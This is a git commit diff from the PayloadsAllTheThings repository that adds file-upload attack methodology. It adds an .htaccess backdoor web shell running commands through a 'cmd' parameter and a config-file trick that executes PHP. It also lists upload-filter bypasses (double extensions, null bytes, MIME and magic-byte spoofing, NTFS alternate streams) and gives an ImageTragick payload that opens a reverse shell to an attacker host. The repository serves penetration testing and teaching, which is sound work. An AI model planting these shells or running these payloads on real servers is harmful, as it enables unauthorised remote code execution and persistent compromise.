mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Upload Methodology
This commit is contained in:
parent
0a01854a6a
commit
21f2b5dca6
@ -1,6 +1,6 @@
|
|||||||
# CONTRIBUTING
|
# CONTRIBUTING
|
||||||
|
|
||||||
PayloadAllTheThings's Team :heart: pull requests :)
|
PayloadsAllTheThings' Team :heart: pull requests :)
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
|
|
||||||
You can also contribute with a :beers: IRL, or using the sponsor button.
|
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||||
|
@ -0,0 +1,5 @@
|
|||||||
|
AddType application/x-httpd-php .htaccess
|
||||||
|
# <?php phpinfo(); ?>
|
||||||
|
SetHandler server-status
|
||||||
|
SetHandler server-info
|
||||||
|
|
@ -0,0 +1,23 @@
|
|||||||
|
# htaccess backdoor shell
|
||||||
|
# this is relatively stealthy compared to a typical webshell
|
||||||
|
|
||||||
|
# overriding deny rule
|
||||||
|
# making htaccess accessible from the internet
|
||||||
|
# without this you'll get a HTTP 403
|
||||||
|
<Files ~ "^\.ht">
|
||||||
|
Require all granted
|
||||||
|
Order allow,deny
|
||||||
|
Allow from all
|
||||||
|
</Files>
|
||||||
|
|
||||||
|
# Make the server treat .htaccess file as .php file
|
||||||
|
AddType application/x-httpd-php .htaccess
|
||||||
|
|
||||||
|
# <?php system($_GET['cmd']); ?>
|
||||||
|
|
||||||
|
# To execute commands you would navigate to:
|
||||||
|
# http://vulnerable.com/.htaccess?cmd=YourCommand
|
||||||
|
|
||||||
|
# If system(); isnt working then try other syscalls
|
||||||
|
# e.g. passthru(); shell_exec(); etc
|
||||||
|
# If you still cant execute syscalls, try bypassing php.ini via htaccess
|
@ -12,48 +12,58 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
|
|||||||
* [Picture upload with LFI](#picture-upload-with-lfi)
|
* [Picture upload with LFI](#picture-upload-with-lfi)
|
||||||
* [Configuration Files](#configuration-files)
|
* [Configuration Files](#configuration-files)
|
||||||
* [CVE - Image Tragik](#cve---image-tragik)
|
* [CVE - Image Tragik](#cve---image-tragik)
|
||||||
|
* [ZIP Archive](#zip-archive)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
- [Fuxploider](https://github.com/almandin/fuxploider)
|
- [Fuxploider](https://github.com/almandin/fuxploider)
|
||||||
|
- [Burp> Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
|
|
||||||
### PHP Extension
|
### PHP Extension
|
||||||
|
|
||||||
```powershell
|
* Default PHP extensions
|
||||||
.php
|
```powershell
|
||||||
.php3
|
.php
|
||||||
.php4
|
.php3
|
||||||
.php5
|
.php4
|
||||||
.php7
|
.php5
|
||||||
|
.php7
|
||||||
Less known extensions
|
```
|
||||||
.pht
|
* Less known extensions
|
||||||
.phar
|
```powershell
|
||||||
.phpt
|
.pht
|
||||||
.pgif
|
.phps
|
||||||
.phtml
|
.phar
|
||||||
.phtm
|
.phpt
|
||||||
|
.pgif
|
||||||
Double extensions
|
.phtml
|
||||||
.jpeg.php
|
.phtm
|
||||||
.jpg.php
|
.inc
|
||||||
.png.php
|
```
|
||||||
```
|
* Double extensions
|
||||||
|
```powershell
|
||||||
|
.jpeg.php
|
||||||
|
.jpg.php
|
||||||
|
.png.php
|
||||||
|
.*.php
|
||||||
|
```
|
||||||
|
|
||||||
### Other extensions
|
### Other extensions
|
||||||
|
|
||||||
```powershell
|
* asp : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
|
||||||
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
|
* perl: `.pl, .pm, .cgi, .lib`
|
||||||
perl: .pl, .pm, .cgi, .lib
|
* jsp : `.jsp, .jspx, .jsw, .jsv, .jspf`
|
||||||
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
|
* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
|
||||||
Coldfusion: .cfm, .cfml, .cfc, .dbm
|
|
||||||
```
|
|
||||||
|
|
||||||
### Upload tricks
|
### Upload tricks
|
||||||
|
|
||||||
|
- Use double extensions : `.jpg.php`
|
||||||
|
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
|
||||||
|
- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
|
||||||
|
|
||||||
- Null byte (works well against `pathinfo()`)
|
- Null byte (works well against `pathinfo()`)
|
||||||
* .php%00.gif
|
* .php%00.gif
|
||||||
* .php\x00.gif
|
* .php\x00.gif
|
||||||
@ -61,13 +71,16 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
|||||||
* .php\x00.png
|
* .php\x00.png
|
||||||
* .php%00.jpg
|
* .php%00.jpg
|
||||||
* .php\x00.jpg
|
* .php\x00.jpg
|
||||||
|
- Special characters
|
||||||
|
* file.php...... (In Windows when a file is created with dots at the end those will be removed)
|
||||||
|
* file.php%20
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
* `Content-Type : image/gif`
|
* `Content-Type : image/gif`
|
||||||
* `Content-Type : image/png`
|
* `Content-Type : image/png`
|
||||||
* `Content-Type : image/jpeg`
|
* `Content-Type : image/jpeg`
|
||||||
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
|
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
|
||||||
|
* Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
|
||||||
Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
|
- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")
|
||||||
|
|
||||||
### Picture upload with LFI
|
### Picture upload with LFI
|
||||||
|
|
||||||
@ -78,6 +91,10 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
|
|||||||
|
|
||||||
### Configuration Files
|
### Configuration Files
|
||||||
|
|
||||||
|
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
|
||||||
|
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
|
||||||
|
|
||||||
|
Configuration files examples
|
||||||
- .htaccess
|
- .htaccess
|
||||||
- web.config
|
- web.config
|
||||||
- httpd.conf
|
- httpd.conf
|
||||||
@ -86,12 +103,23 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
|
|||||||
|
|
||||||
### CVE - Image Tragik
|
### CVE - Image Tragik
|
||||||
|
|
||||||
|
Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
HTTP Request
|
push graphic-context
|
||||||
Reverse Shell
|
viewbox 0 0 640 480
|
||||||
Touch command
|
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
|
||||||
|
pop graphic-context
|
||||||
```
|
```
|
||||||
|
|
||||||
|
More payload in the folder `Picture Image Magik`
|
||||||
|
|
||||||
|
### ZIP archive
|
||||||
|
|
||||||
|
When a ZIP/archive file is automatically decompressed after the upload
|
||||||
|
|
||||||
|
* Zip Slip: directory traversal to write a file somewhere else
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||||
|
Loading…
Reference in New Issue
Block a user